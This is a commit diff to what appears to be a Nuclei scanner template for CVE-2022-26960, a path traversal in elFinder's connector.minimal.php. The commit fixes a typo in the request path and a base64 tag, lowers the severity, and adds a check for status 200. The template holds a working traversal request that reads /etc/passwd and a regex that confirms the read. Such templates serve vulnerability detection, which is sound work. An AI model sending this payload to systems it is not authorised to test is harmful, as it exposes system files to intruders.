Update CVE-2022-26960.yaml

cves/2022/CVE-2022-26960.yaml

@@ -3,18 +3,20 @@ id: CVE-2022-26960
 info:
   name: elFinder - Path Traversal
   author: pikpikcu
-  severity: critical
+  severity: high
   description: |
     Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
   reference:
     - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
     - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+  metadata:
+    verified: true
   tags: cve,cve2022,lfi,elfinder
 
 requests:
   - raw:
       - |
-        GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
+        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
@@ -23,3 +25,7 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200